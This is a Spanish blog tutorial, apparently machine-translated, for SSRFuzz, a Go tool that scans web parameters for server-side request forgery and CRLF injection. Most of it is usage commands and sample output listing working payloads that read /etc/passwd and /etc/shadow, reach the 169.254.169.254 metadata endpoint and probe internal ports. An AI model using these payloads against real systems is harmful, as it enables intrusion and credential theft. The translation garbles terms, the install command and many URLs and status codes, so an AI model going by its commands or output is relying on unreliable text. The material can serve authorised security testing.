Tutoriales

Una aparejo para encontrar vulnerabilidades de falsificación de solicitudes del costado del servidor

SSRFuzz es una aparejo para encontrar vulnerabilidades de falsificación de solicitudes del costado del servidor, con capacidades de encadenamiento CRLF.

¿Por qué?

  • Quería escribir una aparejo en Golang para la concurrencia.
  • Quería fuzz parámetros para vulnerabilidades SSRF, así como fuzz entreambos rutas y parámetros para inyecciones de CRLF
  • Me inspiré en el trabajo de Orange para encadenar este tipo de vulnerabilidades (https://blog.orange.tw)

Instalación

Ejecute el subsiguiente comando para intsall

ve a -u github.com/ryandamour/ssrfuzz

Uso

Uso:
escaneo ssrfuzz [flags]Banderas:
-b, –call-back string Ampliar devolución de indicación para fuzzing SSRF (es opinar: https://github.com/ropnop/serverless_toolkit/tree/master/ssrf_slack)
-c, –dependencia de cookies Cookie que se utilizará para las solicitudes
–Crlf-path Agrega cargas aperos CRLF a todas las rutas disponibles (es opinar: site.com/%0Atest.php)
–Delay int El tiempo que cada hilo aplazamiento entre solicitudes en milisegundos (predeterminado 100)
-d, –domains string Ubicación de los dominios con parámetros para escanear
-h, –ayuda de ayuda para escanear
-x, –http-method string Método HTTP – GET o POST (predeterminado «GET»)
-o, –dependencia de salida Ubicación para asegurar los resultados
–Skip-crlf Prescindir fuzzing CRLF
–Skip-network Prescindir fuzzing de red
–Saltar esquema Saltar esquema de fuzzing
-s, –slack-webhook string Slack webhook para despachar resultados a un canal
-t, –threads int Número de subprocesos para ejecutar ssrfuzz (predeterminado 50)
–Timeout int La cantidad de tiempo necesario para cerrar una conexión que podría colgarse (predeterminado 10)
-u, –user-agent string Agente de heredero para solicitudes (predeterminado “Mozilla / 5.0 (X11; Linux x86_64) AppleWebKit / 537.36 (KHTML, como Gecko) Chrome / 81.0.4044.138 Safari / 537.36”)
-v, –verbose verbose salida

Uso:
echo «http: // url_to_fuzz» | escaneo ssrfuzz
cat file_of_domains.txt | escaneo ssrfuzz
ssrfuzz scan -d file_of_domains.txt

* Escaneo de cargas aperos de esquema y http con crlf:

echo “http://192.168.1.10/test.php?u=” | ve a ejecutar main.go scan
[!] Coincidencia de carga útil del esquema:

* http: //192.168.1.10/test.php? u = archivo: // etc / passwd 200
[!] Se encontraron cargas aperos interesantes
* http: //192.168.1.10/test.php? u = http: //127.1.0.0: 80200
* http: //192.168.1.10/test.php? u = http: //127.1.0.0: 8080500
* http: //192.168.1.10/test.php? u = http: //127.1.0.0: 443500
* http: //192.168.1.10test.php? u = http: //127.1.0.0: 22 500
* http: //192.168.1.10/test.ph? u = http: //127.1.0.0: 25 500
* http: //192.168.1.10/test.php? u = http: //127.1.0.0: 445 500
[!] Se encontraron cargas aperos interesantes
* http: //192.168.1.10/test.php? u = http: //127.127.127.127: 80% 23% OA 200
* http: //192.168.1.10/test.php? u = http: //127.127.127.127: 80% 23% OA 200
* http: //192.168.1.10/test.php? u = http: //127.127.127.127: 8080% 23% OA 500
* http: //192.168.1.10/test.php? u = http: //127.127.127.127: 8080% 23% OA 500

* Escaneando solo cargas http con crlf:

echo “http://192.168.1.10/test.php?u=” | ve a ejecutar main.go scan –skip-schema

[!] Se encontraron cargas aperos interesantes
* http: //192.168.1.10/test.php? u = http: //127.127.127.127: 80% 23% OA 200
* http: //192.168.1.10/test.php? u = http: //127.127.127.127: 80% 23% OA 200
* http: //192.168.1.10/test.php? u = http: //127.127.127.127: 8080% 23% OA 500
* http: //192.168.1.10/test.php? u = http: //127.127.127.127: 8080% 23% OA 500
* http: //192.168.1.10/test.php? u = http: //127.127.127.127: 443% 23% OA 500
* http: //192.168.1.10/test.php? u = http: //127.127.127.127: 443% 23% OA 500
* http: //192.168.1.10/test.php? u = http: //127.127.127.127: 25% 23% OA 500
* http: //192.168.1.10/test.php? u = http: //127.127.127.127: 25% 23% OA 500
* http: //192.168.1.10/test.php? u = http: //127.127.127.127: 22% 23% OA 500
* http: //192.168.1.10/test.php? u = http: //127.127.127.127: 22% 23% OA 500
* http: //192.168.1.10/test.php? u = http: //127.127.127.127: 445% 23% OA 500
* http: //192.168.1.10/test.php? u = http: //127.127.127.127: 445% 23% OA 500

* Escaneando solo cargas http sin crlf:

echo “http://192.168.1.10/test.php?u=” | ve a ejecutar main.go scan –skip-schema –skip-crlf

[!] Se encontraron cargas aperos interesantes
* http: //192.168.1.10/test.php? u = http: //127.1.0.0: 80200
* http: //192.168.1.10/test.php? u = http: //127.1.0.0: 8080500
* http: //192.168.1.10/test.php? u = http: //127.1.0.0: 443500
* http: //192.168.1.10/test.php? u = http: //127.1.0.0: 22 500
* http: //192.168.1.10/test.php? u = http: //127.1.0.0: 25 500
* http: //192.168.1.10/test.php? u = http: //127.1.0.0: 445 500

* Escaneo solo de cargas aperos del esquema sin crlf:

echo “http://192.168.1.10/test.php?u=” | ve a ejecutar main.go scan –skip-network –skip-crlf

[!] Se encontraron cargas aperos interesantes
* http: //192.168.1.10/test.php? u = archivo: /// etc / passwd 200
* http: //192.168.1.10/test.php? u = archivo: /// etc / shadow 500
* http: //192.168.1.10/test.php? u = archivo: //169.254.169.254/ 500

Publicaciones relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Botón volver arriba